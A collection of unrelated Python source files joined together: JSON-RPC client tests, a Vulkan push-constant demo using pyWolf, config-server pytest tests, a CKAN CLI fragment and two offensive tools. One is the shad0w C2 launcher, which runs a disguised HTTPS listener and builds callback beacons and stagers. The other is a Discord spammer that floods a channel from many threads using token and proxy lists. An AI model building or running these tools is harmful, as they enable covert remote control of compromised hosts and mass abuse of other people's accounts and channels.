assert not type([]) == Object
assert type([]) == Array
assert type('') == Any
assert Any.kind('') == String
assert Any.decode('str') == String
assert Any.kind({}) == Object
assert Any.kind(None) == Nil
assert type(1) == Number
assert type(1.1) == Number
class ServiceProxyTest(JSONServerTestCase):
def test_positional_args(self):
proxy = ServiceProxy(self.host)
self.assert_(proxy.jsonrpc.test('Hello')['result'] == 'Hello')
try:
proxy.jsonrpc.test(string='Hello')
except Exception as e:
self.assert_(e.args[0] == 'Unsupported arg type for JSON-RPC 1.0 '
'(the default version for this client, '
'pass version="2.0" to use keyword arguments)')
else:
self.assert_(False, 'Proxy didnt warn about version mismatch')
def test_keyword_args(self):
proxy = ServiceProxy(self.host, version='2.0')
self.assert_(proxy.jsonrpc.test(string='Hello')['result'] == 'Hello')
self.assert_(proxy.jsonrpc.test('Hello')['result'] == 'Hello')
def test_testing_proxy(self):
client = Client()
proxy = TestingServiceProxy(client, self.host, version='2.0')
self.assert_(proxy.jsonrpc.test(string='Hello')['result'] == 'Hello')
self.assert_(proxy.jsonrpc.test('Hello')['result'] == 'Hello')
class JSONRPCTest(JSONServerTestCase):
def setUp(self):
super(JSONRPCTest, self).setUp()
self.proxy10 = ServiceProxy(self.host, version='1.0')
self.proxy20 = ServiceProxy(self.host, version='2.0')
def test_10(self):
self.assertEqual(
self.proxy10.jsonrpc.test('this is a string')['result'],
'this is a string')
def test_11(self):
req = {
'version': '1.1',
'method': 'jsonrpc.test',
'params': ['this is a string'],
'id': 'holy-mother-of-god'
}
resp = _call(self.host, req)
self.assertEquals(resp['id'], req['id'])
self.assertEquals(resp['result'], req['params'][0])
def test_10_notify(self):
pass
def test_11_positional_mixed_args(self):
req = {
'version': '1.1',
'method': 'jsonrpc.strangeEcho',
'params': {'1': 'this is a string', '2': 'this is omg',
'wtf': 'pants', 'nowai': 'nopants'},
'id': 'toostrange'
}
resp = _call(self.host, req)
self.assertEquals(resp['result'][-1], 'Default')
self.assertEquals(resp['result'][1], 'this is omg')
self.assertEquals(resp['result'][0], 'this is a string')
self.assert_('error' not in resp)
def test_11_GET(self):
pass
def test_11_GET_unsafe(self):
pass
def test_11_GET_mixed_args(self):
params = {'1': 'this is a string', '2': 'this is omg',
'wtf': 'pants', 'nowai': 'nopants'}
url = "%s%s?%s" % (
self.host, 'jsonrpc.strangeSafeEcho',
(''.join(['%s=%s&' % (k, urllib_parse.quote(v)) for k, v in params.items()])).rstrip('&')
)
resp = loads(urllib_request.urlopen(url).read().decode('utf-8'))
self.assertEquals(resp['result'][-1], 'Default')
self.assertEquals(resp['result'][1], 'this is omg')
self.assertEquals(resp['result'][0], 'this is a string')
self.assert_('error' not in resp)
def test_20_checked(self):
self.assertEqual(
self.proxy10.jsonrpc.varArgs('o', 'm', 'g')['result'],
['o', 'm', 'g']
)
self.assert_(self.proxy10.jsonrpc.varArgs(1,2,3)['error'])
def test_11_service_description(self):
pass
def test_20_keyword_args(self):
self.assertEqual(
self.proxy20.jsonrpc.test(string='this is a string')['result'],
'this is a string')
def test_20_positional_args(self):
self.assertEqual(
self.proxy20.jsonrpc.test('this is a string')['result'],
'this is a string')
def test_20_notify(self):
req = {
'jsonrpc': '2.0',
'method': 'jsonrpc.notify',
'params': ['this is a string'],
'id': None
}
resp = urllib_request.urlopen(self.host, dumps(req).encode('utf-8')).read().decode('utf-8')
self.assertEquals(resp, '')
def test_20_batch(self):
req = [{
'jsonrpc': '2.0',
'method': 'jsonrpc.test',
'params': ['this is a string'],
'id': 'id-'+str(i)
} for i in range(5)]
resp = loads(urllib_request.urlopen(self.host, dumps(req).encode('utf-8')).read().decode('utf-8'))
self.assertEquals(len(resp), len(req))
for i, D in enumerate(resp):
self.assertEquals(D['result'], req[i]['params'][0])
self.assertEquals(D['id'], req[i]['id'])
def test_20_batch_with_errors(self):
req = [{
'jsonrpc': '2.0',
'method': 'jsonrpc.test' if not i % 2 else 'jsonrpc.fails',
'params': ['this is a string'],
'id': 'id-'+str(i)
} for i in range(10)]
resp = loads(urllib_request.urlopen(self.host, dumps(req).encode('utf-8')).read().decode('utf-8'))
self.assertEquals(len(resp), len(req))
for i, D in enumerate(resp):
if not i % 2:
self.assertEquals(D['result'], req[i]['params'][0])
self.assertEquals(D['id'], req[i]['id'])
self.assert_('error' not in D)
else:
self.assert_('result' not in D)
self.assert_('error' in D)
self.assertEquals(D['error']['code'], 500)
def test_authenticated_ok(self):
self.assertEquals(
self.proxy10.jsonrpc.testAuth(
'sammeh', 'password', 'this is a string')['result'],
'this is a string')
def test_authenticated_ok_kwargs(self):
self.assertEquals(
self.proxy20.jsonrpc.testAuth(
username='sammeh', password='password', string='this is a string')['result'],
'this is a string')
def test_authenticated_fail_kwargs(self):
try:
self.proxy20.jsonrpc.testAuth(
username='osammeh', password='password', string='this is a string')
except IOError as e:
self.assertEquals(e.args[1], 401)
else:
self.assert_(False, 'Didnt return status code 401 on unauthorized access')
def test_authenticated_fail(self):
try:
self.proxy10.jsonrpc.testAuth(
'osammeh', 'password', 'this is a string')
except IOError as e:
self.assertEquals(e.args[1], 401)
else:
self.assert_(False, 'Didnt return status code 401 on unauthorized access')
if __name__ == '__main__':
server = None
if os.path.exists('test.sqlite3'):
os.remove('test.sqlite3')
try:
server = start_json_server_thread()
unittest.main(argv=sys.argv)
finally:
if server:
server.stop()
if os.path.exists('test.sqlite3'):
os.remove('test.sqlite3')
|
12_push_constants.py
|
import sys, os
#get path of script
_script_path = os.path.realpath(__file__)
_script_dir = os.path.dirname(_script_path)
pyWolfPath = _script_dir
if sys.platform == "linux" or sys.platform == "linux2":
print "Linux not tested yet"
elif sys.platform == "darwin":
print "OS X not tested yet"
elif sys.platform == "win32":
pyWolfPath = pyWolfPath + "\\..\\..\\..\\..\\bin\\x64\\Debug\\Win32\\"
if pyWolfPath != "" and (not pyWolfPath in sys.path):
sys.path.append(pyWolfPath)
import ctypes, threading, pyWolf
from math import cos
from PySide import QtGui, QtCore
from PySide.QtGui import *
from PySide.QtCore import *
screen_width = 800
screen_height = 600
class gui(QWidget):
def __init__(self, parent=None):
super(gui, self).__init__(parent)
self.debug_text = ""
self._label = QLabel()
self._label.setAlignment(Qt.AlignLeft)
self.color_dialog = QColorDialog()
self.color_dialog.setCurrentColor(QColor(102, 178, 0))
self.color_dialog.setOptions(QColorDialog.NoButtons)
vbox = QVBoxLayout()
vbox.addWidget(self._label)
vbox.addWidget(self.color_dialog)
self.setLayout(vbox)
timer = QTimer(self)
timer.timeout.connect(self.updateTime)
timer.start(50)
def updateTime(self):
self._label.setText(self.debug_text)
class scene(QWidget):
def __init__(self, pContentPath, pLogPath, pAppName, parent = None):
super(scene, self).__init__(parent)
self.__exiting = False
self._game = pyWolf.framework.w_game(pContentPath, pLogPath, pAppName)
self._game.set_pre_init_callback(self.pre_init)
self._game.set_post_init_callback(self.post_init)
self._game.set_load_callback(self.load)
self._game.set_update_callback(self.update)
self._game.set_pre_render_callback(self.pre_render)
self._game.set_post_render_callback(self.post_render)
self._gDevice = None
self._viewport = pyWolf.graphics.w_viewport()
self._viewport_scissor = pyWolf.graphics.w_viewport_scissor()
self._draw_command_buffers = pyWolf.graphics.w_command_buffers()
self._draw_render_pass = pyWolf.graphics.w_render_pass()
self._draw_fence = pyWolf.graphics.w_fences()
self._draw_semaphore = pyWolf.graphics.w_semaphore()
self._shader = pyWolf.graphics.w_shader()
self._mesh = pyWolf.graphics.w_mesh()
self._texture = pyWolf.graphics.w_texture()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._PushConstantColorEdit = [0.4,0.7,0,1]
self._pipeline = pyWolf.graphics.w_pipeline()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_config = pyWolf.graphics.w_graphics_device_manager_configs()
_config.debug_gpu = False
self._game.set_graphics_device_manager_configs(_config)
def pre_init(self):
print "pre_init"
def post_init(self):
#get main graphics device
self._gDevice = self._game.get_graphics_device(0)
print self._gDevice.get_info()
print "post_init"
def load(self):
#initialize viewport
self._viewport.y = 0
self._viewport.width = screen_width
self._viewport.height = screen_height
self._viewport.minDepth = 0
self._viewport.maxDepth = 1
#initialize scissor of viewport
self._viewport_scissor.offset.x = 0
self._viewport_scissor.offset.y = 0
self._viewport_scissor.extent.width = screen_width
self._viewport_scissor.extent.height = screen_height
#load render pass which contains frame buffers
_render_pass_attachments = []
_output_window = self._gDevice.output_presentation_window
for _iter in _output_window.swap_chain_image_views:
# COLOR #DEPTH
_render_pass_attachments.append([_iter, _output_window.depth_buffer_image_view])
_hr = self._draw_render_pass.load(self._gDevice, self._viewport, self._viewport_scissor, _render_pass_attachments)
if _hr:
print "Error on loading render pass"
self.release()
sys.exit(1)
#create one semaphore for drawing
_hr = self._draw_semaphore.initialize(self._gDevice)
if _hr:
print "Error on initializing semaphore"
self.release()
sys.exit(1)
#create one fence for drawing
_hr = self._draw_fence.initialize(self._gDevice, 1)
if _hr:
print "Error on initializing fence(s)"
self.release()
sys.exit(1)
#create one fence for drawing
number_of_swap_chains = self._gDevice.get_number_of_swap_chains()
_hr = self._draw_command_buffers.load(self._gDevice, number_of_swap_chains, pyWolf.graphics.w_command_buffer_level.PRIMARY)
if _hr:
print "Error on initializing draw command buffer(s)"
self.release()
sys.exit(1)
#loading vertex shader
_content_path_dir = _script_dir + "/content/"
_hr = self._shader.load(self._gDevice, _content_path_dir + "shaders/shader.vert.spv", pyWolf.graphics.w_shader_stage_flag_bits.VERTEX_SHADER)
if _hr:
print "Error on loading vertex shader"
self.release()
sys.exit(1)
#loading fragment shader
_hr = self._shader.load(self._gDevice, _content_path_dir + "shaders/shader.frag.spv", pyWolf.graphics.w_shader_stage_flag_bits.FRAGMENT_SHADER)
if _hr:
print "Error on loading fragment shader"
self.release()
sys.exit(1)
_hr = self._texture.initialize(self._gDevice, 8, 8, False, False)
if _hr:
print "Error on initializing texture"
self.release()
sys.exit(1)
self._texture.set_view_type(pyWolf.graphics.w_image_view_type._2D_ARRAY)
#load texture from file
_hr = self._texture.load_texture_2D_from_file(_content_path_dir + "../../../../../Logo.jpg", True)
if _hr:
print "Error on loading " + _content_path_dir + "../../../../../Logo.jpg"
self.release()
sys.exit(1)
#just we need vertex position color
_vba = pyWolf.graphics.w_vertex_binding_attributes(pyWolf.graphics.w_vertex_declaration.VERTEX_POSITION_UV)
self._mesh.set_vertex_binding_attributes(_vba)
_shader_param_0 = pyWolf.graphics.w_shader_binding_param()
_shader_param_0.index = 0
_shader_param_0.type = pyWolf.graphics.w_shader_binding_type.SAMPLER2D
_shader_param_0.stage = pyWolf.graphics.w_shader_stage_flag_bits.FRAGMENT_SHADER
_shader_param_0.image_info = self._texture.get_descriptor_info()
_hr = self._shader.set_shader_binding_params( [_shader_param_0 ])
if _hr:
print "Set shader binding params"
#loading pipeline cache
_pipeline_cache_name = "pipeline_cache"
_hr = self._pipeline.create_pipeline_cache(self._gDevice, _pipeline_cache_name)
if _hr:
print "Error on creating pipeline cache"
_rasterization_states = pyWolf.graphics.w_graphics_device.defaults_states.pipelines.rasterization_create_info
_multisample_states = pyWolf.graphics.w_graphics_device.defaults_states.pipelines.multisample_create_info
_blend_states = pyWolf.graphics.w_graphics_device.defaults_states.blend_states.premulitplied_alpha
_blend_color = pyWolf.system.w_color.TRANSPARENT_()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_push_constant_range = pyWolf.graphics.w_push_constant_range()
_push_constant_range.offset = 0
_push_constant_range.size = 4 * 4 # 4 * sizeof(float)
_push_constant_range.shader_stage_flags = pyWolf.graphics.w_shader_stage_flag_bits.VERTEX_SHADER
#create pipeline
_hr = self._pipeline.load(self._gDevice, _vba, pyWolf.graphics.w_primitive_topology.TRIANGLE_LIST, self._draw_render_pass, self._shader, [self._viewport], [ self._viewport_scissor ], _pipeline_cache_name, [], [_push_constant_range], 0, _rasterization_states, _multisample_states, _blend_states, _blend_color)
if _hr:
print "Error on creating pipeline"
self.release()
sys.exit(1)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_vertex_data = [
-0.7, -0.7, 0.0, #pos0
0.0, 0.0, #uv0
-0.7, 0.7, 0.0, #pos1
0.0, 1.0, #uv1
0.7, 0.7, 0.0, #pos2
1.0, 1.0, #uv2
0.7, -0.7, 0.0, #pos3
1.0, 0.0, #uv3
]
_index_data = [ 0,1,3,3,1,2 ]
#create mesh
self._mesh.set_texture(self._texture)
_hr = self._mesh.load(self._gDevice, _vertex_data, _index_data, False)
if _hr:
print "Error on loading mesh"
self.release()
sys.exit(1)
print "scene loaded successfully"
def build_command_buffers(self):
_hr = pyWolf.W_PASSED
_size = self._draw_command_buffers.get_commands_size()
for i in xrange(_size):
_cmd = self._draw_command_buffers.get_command_at(i)
_hr = self._draw_command_buffers.begin(i)
if _hr:
print "Error on begining command buffer: " + str(i)
break
self._draw_render_pass.begin(i, _cmd, pyWolf.system.w_color.CORNFLOWER_BLUE(), 1.0, 0)
self._pipeline.bind(_cmd)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._pipeline.set_push_constant_buffer(_cmd, pyWolf.graphics.w_shader_stage_flag_bits.VERTEX_SHADER, 0, self._PushConstantColorEdit)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._mesh.draw(_cmd, None, 0, False)
self._draw_render_pass.end(_cmd)
_hr = self._draw_command_buffers.end(i)
if _hr:
print "Error on ending command buffer: " + str(i)
break
return _hr
def update(self, pGameTime):
#Update label of gui widget
global _gui
_gui.debug_text = "FPS: " + str(pGameTime.get_frames_per_second()) + "\r\n\r\nFrameTime: " + str(pGameTime.get_elapsed_seconds()) + "\r\n\r\nTotalTime: " + str(pGameTime.get_total_seconds())
def pre_render(self, pGameTime):
_output_window = self._gDevice.output_presentation_window
_frame_index = _output_window.swap_chain_image_index
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
global _gui
_color = _gui.color_dialog.currentColor()
_rgba = [_color.redF(), _color.greenF(), _color.blueF(), _color.alphaF()]
if (self._PushConstantColorEdit[0] != _rgba[0]) or (self._PushConstantColorEdit[1] != _rgba[1]) or (self._PushConstantColorEdit[2] != _rgba[2]) or (self._PushConstantColorEdit[3] != _rgba[3]):
self.build_command_buffers()
self._PushConstantColorEdit = _rgba
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_wait_dst_stage_mask = [ pyWolf.graphics.w_pipeline_stage_flag_bits.COLOR_ATTACHMENT_OUTPUT_BIT ]
_wait_semaphores = [ _output_window.swap_chain_image_is_available_semaphore ]
_signal_semaphores = [ _output_window.rendering_done_semaphore ]
_cmd = self._draw_command_buffers.get_command_at(_frame_index)
_cmd_buffers = [_cmd]
#reset draw fence
self._draw_fence.reset()
_hr = self._gDevice.submit(_cmd_buffers, self._gDevice.graphics_queue, _wait_dst_stage_mask, _wait_semaphores, _signal_semaphores, self._draw_fence)
if _hr:
print "Error on submit to graphics device"
return
_hr = self._draw_fence.wait()
if _hr:
print "Error on waiting for draw fence"
return
def post_render(self, pSuccessfullyRendered):
if pSuccessfullyRendered == False:
print "Rendered Unsuccessfully"
def run(self):
#run game
_window_info = pyWolf.system.w_window_info()
_window_info.width = self.width()
_window_info.height = self.height()
_window_info.v_sync_enable = False
_window_info.is_full_screen = False
_window_info.swap_chain_format = 44 # BGRA8Unorm in VULKAN
_window_info.cpu_access_swap_chain_buffer = False
# get window handle
pycobject_hwnd = self.winId()
#convert window handle as HWND to unsigned integer pointer for c++
ctypes.pythonapi.PyCObject_AsVoidPtr.restype = ctypes.c_void_p
ctypes.pythonapi.PyCObject_AsVoidPtr.argtypes = [ctypes.py_object]
int_hwnd = ctypes.pythonapi.PyCObject_AsVoidPtr(pycobject_hwnd)
_window_info.set_win_id(int_hwnd)
#initialize game
_map_info = (0, _window_info)
while True:
if self.__exiting:
self.release()
break
self._game.run(_map_info)
print "Game exited"
def showEvent(self, event):
#run in another thread
threading.Thread(target=self.run).start()
event.accept()
def closeEvent(self, event):
self.__exiting = True
event.accept()
def keyPressEvent(self, event):
_key = event.key()
if _key == QtCore.Qt.Key.Key_Escape:
self.__exiting = True
def release(self):
self._draw_fence.release()
self._draw_fence = None
self._draw_semaphore.release()
self._draw_semaphore = None
self._draw_command_buffers.release()
self._draw_command_buffers = None
self._draw_render_pass.release()
self._draw_render_pass = None
self._shader.release()
self._shader = None
self._pipeline.release()
self._pipeline = None
self._mesh.release()
self._mesh = None
self._texture.release()
self._texture = None
self._game.release()
self._game = None
self._gDevice = None
self._viewport = None
self._viewport_scissor = None
if __name__ == '__main__':
# Create a Qt application
_app = QApplication(sys.argv)
#Init gui
_gui = gui()
_gui.resize(screen_width /2, screen_height /2)
_gui.setWindowTitle('Wolf.Engine Debug')
#Init scene
_scene = scene(pyWolfPath + "..\\..\\..\\..\\content\\",
pyWolfPath,
"py_11_pipeline")
_scene.resize(screen_width, screen_height)
_scene.setWindowTitle('Wolf.Engine')
#Show all widgets
_scene.show()
_gui.show()
sys.exit(_app.exec_())
|
test_config_server.py
|
# (C) Copyright 2020- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
#
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
from __future__ import absolute_import, print_function, unicode_literals
import time
import sys
import multiprocessing
import pytest
import requests
from servicelib import compat, utils
from servicelib.config import client
def test_config_server_in_read_write_mode(config_server):
config_server.initial_config = {"foo": 42}
config_server.start()
c = config_server.client
assert c.get("foo") == 42
c.set("foo", 43)
assert c.get("foo") == 43
c.delete("foo")
with pytest.raises(Exception) as exc:
c.get("foo")
assert str(exc.value).startswith("No config value for `foo`")
def test_config_server_in_read_only_mode(config_server):
config_server.initial_config = {"foo": 42}
config_server.read_only = True
config_server.start()
c = config_server.client
assert c.get("foo") == 42
with pytest.raises(Exception) as exc:
c.set("foo", 43)
assert str(exc.value) == "Config server in read-only mode"
assert c.get("foo") == 42
with pytest.raises(Exception) as exc:
c.delete("foo")
assert str(exc.value) == "Config server in read-only mode"
assert c.get("foo") == 42
def test_client_uses_cached_values_when_server_is_down(config_server):
config_server.initial_config = {"foo": 42}
config_server.start()
assert config_server.client.get("foo") == 42
config_server.stop()
with pytest.raises(requests.ConnectionError):
requests.get(config_server.client.url)
time.sleep(config_server.client.poll_interval + 1)
assert config_server.client.get("foo") == 42
def test_client_needs_cached_values_when_server_is_down(config_server):
config_server.stop()
with pytest.raises(requests.ConnectionError):
requests.get(config_server.client.url)
with pytest.raises(requests.ConnectionError):
config_server.client.get("foo")
config_server.initial_config = {"foo": 42}
config_server.start()
assert config_server.client.get("foo") == 42
def test_settings_change_in_child_process(config_server):
config_server.start()
if compat.PY3:
ctx = multiprocessing.get_context("fork")
else:
ctx = multiprocessing
parent_conn, child_conn = ctx.Pipe()
def child(conn):
c = client.instance(url=config_server.url)
while True:
try:
msg = conn.recv()
if msg == "quit":
return
conn.send(c.get(msg))
except Exception as exc:
print(exc, file=sys.stderr)
sys.stderr.flush()
config_server.client.set("foo", 42)
p = ctx.Process(target=child, args=(child_conn,))
p.start()
try:
parent_conn.send("foo")
assert parent_conn.recv() == 42
config_server.client.set("foo", 43)
time.sleep(config_server.client.poll_interval + 1)
parent_conn.send("foo")
assert parent_conn.recv() == 43
finally:
parent_conn.send("quit")
p.join()
@pytest.mark.parametrize("invalid_key", ["", None])
def test_set_with_invalid_key(config_server, invalid_key):
with pytest.raises(ValueError) as exc:
config_server.client.set(invalid_key, 42)
assert str(exc.value) == "Invalid key `{}`".format(invalid_key)
def test_delete_entry(config_server):
config_server.initial_config = {"foo": 42}
config_server.start()
c = config_server.client
assert c.get("foo") == 42
with pytest.raises(KeyError):
c.delete("no-such-key")
c.delete("foo")
with pytest.raises(Exception) as exc:
c.get("foo")
assert str(exc.value).startswith("No config value for `foo`")
def test_health_endpoint(config_server):
config_server.start()
res = config_server.http_get("/health")
assert res.status_code == 200
def test_run_in_foreground(config_server):
config_server.initial_config = {"foo": 42}
config_server.start(background=False)
utils.wait_for_url(config_server.url)
assert config_server.client.get("foo") == 42
def test_empty_post_request(config_server):
config_server.initial_config = {"foo": 42}
config_server.start()
res = config_server.http_post(
"/settings/foo", headers={"content-type": "application/json"}
)
assert res.status_code == 200
assert config_server.client.get("foo") == 42
def test_error_saving_config(config_server):
config_server.initial_config = {"foo": 42}
config_server.start()
c = config_server.client
assert c.get("foo") == 42
config_server.config_file.parent.chmod(0o555)
try:
with pytest.raises(Exception) as exc:
c.set("foo", 43)
assert "Cannot save config" in str(exc.value)
assert c.get("foo") == 42
with pytest.raises(Exception) as exc:
c.delete("foo")
assert "Cannot save config" in str(exc.value)
assert c.get("foo") == 42
finally:
config_server.config_file.parent.chmod(0o755)
|
shad0w.py
|
#!/usr/bin/env python3
import os
import sys
import ssl
import socket
import asyncio
import argparse
from threading import Thread
from lib import debug
from lib import banner
from lib import http_server
from lib import console
from lib import encryption
from lib import buildtools
from lib import mirror
from lib import payload_format
from lib import tools
class Shad0wC2(object):
def __init__(self, args):
super(Shad0wC2, self).__init__()
# payload store
self.payloads = {}
# declare all the vitial variables to run.
self.addr = (args['address'], args['port'])
self.debugv = args['debug']
self.sslkey = args['key']
self.sslcrt = args['cert']
# framework variables
self.variables = {}
# set the msf callback size
self.variables["MsfUriSize"] = 1337
# website we can mirror
self.mirror = args['mirror']
# endpoint for modules to callback to
self.endpoint = args['endpoint']
# runtime variables
self.beacons = {}
self.beacon_count = 0
self.current_beacon = None
# loading screen stuff
self.screen_finish = False
# get the debug/logging stuff ready
self.debug = debug.Debug(self.debugv)
# console class
self.console = console.Console(self)
# super useful
self.crypt = encryption
def start(self):
# mirror a website if we need to
if self.mirror is not None:
mirror.mirror_site(self, self.mirror)
# compile the payloads, this makes execution of modules quicker
self.compile_finished = False
# start the loading banner
Thread(target=tools.loading_banner, args=(self,)).start()
# start to do the compiling
asyncio.run(tools.compile_and_store_static(self))
asyncio.run(tools.compile_and_store_static_srdi(self))
# make sure we are in the rootdir
os.chdir("/root/shad0w")
# make sure the loading screen has finished
while self.screen_finish != True:
pass
# show the banner
banner.Banner()
# start the http server thread
# self.debug.log("starting http server thread")
thttp = Thread(target=http_server.run_serv, args=(self,))
thttp.daemon = True
thttp.start()
# asyncio.run(http_server.run_serv(self))
# start the console
asyncio.run(self.console.start())
# tconsole = Thread(target=self.console.start)
# tconsole.daemon = False
# tconsole.start()
class Shad0wBuilder(object):
def __init__(self, args):
super(Shad0wBuilder, self).__init__()
# key variables for the build
self.address = args['address']
self.port = args['port']
self.jitter = args['jitter']
self.format = args['format']
self.outfile = args['out']
self.debugv = args['debug']
self.payload = args['payload']
self.no_shrink = args['no_shrink']
# get the debug/logging stuff ready
self.debug = debug.Debug(self.debugv)
def build(self):
# get the variables for the make
self.arch, self.platform, self.secure, self.static = buildtools.get_payload_variables(self.payload)
# copy the correct source files into build directory
if self.static is not None:
# then we are building a static beacon
# what type we need?
if self.format == "exe":
buildtools.clone_source_files(asm=True)
else:
buildtools.clone_source_files(asm=True, rootdir="injectable")
if self.static is None:
# then we are building a stager
buildtools.clone_source_files(asm=True, rootdir="stager")
# change the settings file based on the args we been given
buildtools.update_settings_file(self)
# now we need to run 'make' inside the cloned dir
if self.format == "dll":
buildtools.make_in_clone(arch=self.arch, platform=self.platform, secure=self.secure, static=self.static, debug=self.debugv, modlocation="/root/shad0w/beacon/beacon.dll")
else:
buildtools.make_in_clone(arch=self.arch, platform=self.platform, secure=self.secure, static=self.static, debug=self.debugv)
length = payload_format.create(self)
if length != False:
print("\033[1;32m[+]\033[0m", f"Created {self.outfile} ({length} bytes)")
if __name__ == '__main__':
# sort the first cmd switch to decide weather we beacon or listen
parser = argparse.ArgumentParser(prog='shad0w')
subparsers = parser.add_subparsers(dest='mode', help='shad0w C2 functions')
listen_parser = subparsers.add_parser('listen', help="Tell shad0w to listen for connections")
beacon_parser = subparsers.add_parser('beacon', help="Tell shad0w to create a beacon")
update_parser = subparsers.add_parser('update', help="Update shad0w")
listen_parser.add_argument("-a", "--address", required=False, default="0.0.0.0", help="Address shad0w will listen on (default will be 0.0.0.0)")
listen_parser.add_argument("-p", "--port", required=False, default=443, help="Port the C2 will bind to (default is 443)")
listen_parser.add_argument("-k", "--key", required=False, default="certs/key.pem", help="Private key for the HTTPS server")
listen_parser.add_argument("-c", "--cert", required=False, default="certs/cert.pem", help="Certificate for the HTTPS server")
listen_parser.add_argument("-m", "--mirror", required=False, default=None, help="Website to mirror for if a client connects to the C2 via a web browser")
listen_parser.add_argument("-d", "--debug", required=False, action='store_true', help="Start debug mode")
listen_parser.add_argument("-e", "--endpoint", required=False, default=None, help="The endpoint shad0w modules will callback to")
beacon_parser.add_argument("-p", "--payload", required=True, help="Beacon payload to use")
beacon_parser.add_argument("-H", "--address", required=True, help="Address the beacon will connect to")
beacon_parser.add_argument("-P", "--port", required=False, default=443, help="Port the beacon will connect on")
beacon_parser.add_argument("-j", "--jitter", required=False, default=1, type=int, help="Jitter the beacon should use when connecting back")
beacon_parser.add_argument("-f", "--format", required=True, choices=payload_format.formats, help="Format to store the beacon payload as")
beacon_parser.add_argument("-o", "--out", required=True, help="File to store the beacon in")
beacon_parser.add_argument("-n", "--no-shrink", required=False, action='store_true', help="Leave the file at its final size, do not attempt to shrink it")
beacon_parser.add_argument("-d", "--debug", required=False, action='store_true', help="Start debug mode")
# parse the args
args = vars(parser.parse_args())
# first check if we need to update
if args["mode"] == "update":
print("Updating...")
os.system("git pull")
# set the arguments for the listen
if args["mode"] == "listen":
shad0w = Shad0wC2(args)
asyncio.run(shad0w.start())
# set the arguments for creating the beacon
if args["mode"] == "beacon":
# build the beacon
shad0w = Shad0wBuilder(args)
shad0w.build()
|
message_spammer.py
|
import requests , threading , random , time
from colorama import Fore , Style
"""
Developed by CRYONICX
All responsibility for the project is on you.
DISCORD = CRYONICX#9999 ID = 788124670556766209
"""
class Message_spammer:
def __init__(self, token , channel_id ,message):
liste = [""]
self.message = message
self.channel = channel_id
self.token = token[:-2]
for x in liste:
self.headers = {'Authorization': self.token}
def send_message(self):
s = requests.session()
proxy = set()
with open("./config/proxy.txt", "r") as f:
file_lines1 = f.readlines()
proxy_count = len(file_lines1)
for line1 in file_lines1:
proxy.add(line1.strip())
if proxy_count != 0:
proxies = {
'http': 'http://'+random.choice(list(proxy))
}
r = requests.post(f"https://discord.com/api/v9/channels/{self.channel}",headers=self.headers , json={'content-type:': "application/json" , 'content' : self.message} , proxies=proxies)
print(f"{Fore.GREEN} [✔] Spamming.{Style.RESET_ALL}" if r else f"{Fore.RED}[X] Failed. {Style.RESET_ALL}")
else:
r = requests.post(f"https://discord.com/api/v9/channels/{self.channel}",headers=self.headers , json={'content-type:': "application/json" , 'content' : self.message})
print(f"{Fore.GREEN} [✔] Spamming.{Style.RESET_ALL}" if r else f"{Fore.RED}[X] Failed.{Style.RESET_ALL}")
return r
def worker(token , message , channel):
lines = []
with open('./config/tokens.txt') as f:
lines = f.readlines()
e = Message_spammer(token , message , channel)
while True:
e.send_message()
def main():
channel_id_input = input(
f"{Fore.BLUE}{Style.BRIGHT}[?] Enter the id of the channel you are spamming > {Style.RESET_ALL}")
if len(channel_id_input) != 18:
print(f"{Fore.RED}[!] Invalid id {Style.RESET_ALL}")
time.sleep(2)
quit()
message_content = input(
f"{Fore.BLACK}{Style.BRIGHT}[?] Type the message you want to spam > {Style.RESET_ALL}")
lines = []
with open('./config/tokens.txt') as f:
lines = f.readlines()
threads = []
for i in lines:
t = threading.Thread(target=worker, args=(i , channel_id_input ,message_content,))
threads.append(t)
t.start()
if __name__ == '__main__':
main()
|
cli.py
|
import collections
import csv
import multiprocessing as mp
import os
import datetime
import sys
from pprint import pprint
import re
import ckan.logic as logic
import ckan.model as model
import ckan.include.rjsmin as rjsmin
import ckan.include.rcssmin as rcssmin
import ckan.lib.fanstatic_resources as fanstatic_resources
import sqlalchemy as sa
import urlparse
import routes
import paste.script
from paste.registry import Registry
from paste.script.util.logging_config import fileConfig
#NB No CKAN imports are allowed until after the config file is loaded.
# i.e. do the imports in methods, after _load_config is called.
# Otherwise loggers get disabled.
def parse_db_config(config_key='sqlalchemy.url'):
''' Takes a config key for a database connection url and parses it into
a dictionary. Expects a url like:
'postgres://tester:pass@localhost/ckantest3'
'''
from pylons import config
url = config[config_key]
regex = [
'^\s*(?P<db_type>\w*)',
'://',
'(?P<db_user>[^:]*)',
':?',
'(?P<db_pass>[^@]*)',
'@',
'(?P<db_host>[^/:]*)',
':?',
'(?P<db_port>[^/]*)',
'/',
'(?P<db_name>[\w.-]*)'
]
db_details_match = re.match(''.join(regex), url)
if not db_details_match:
raise Exception('Could not extract db details from url: %r' % url)
db_details = db_details_match.groupdict()
return db_details
class MockTranslator(object):
def gettext(self, value):
return value
def ugettext(self, value):
return value
def ungettext(self, singular, plural, n):
if n > 1:
return plural
return singular
class CkanCommand(paste.script.command.Command):
'''Base class for classes that implement CKAN paster commands to inherit.
'''
parser = paste.script.command.Command.standard_parser(verbose=True)
parser.add_option('-c', '--config', dest='config',
default='development.ini', help='Config file to use.')
parser.add_option('-f', '--file',
action='store',
dest='file_path',
help="File to dump results to (if needed)")
default_verbosity = 1
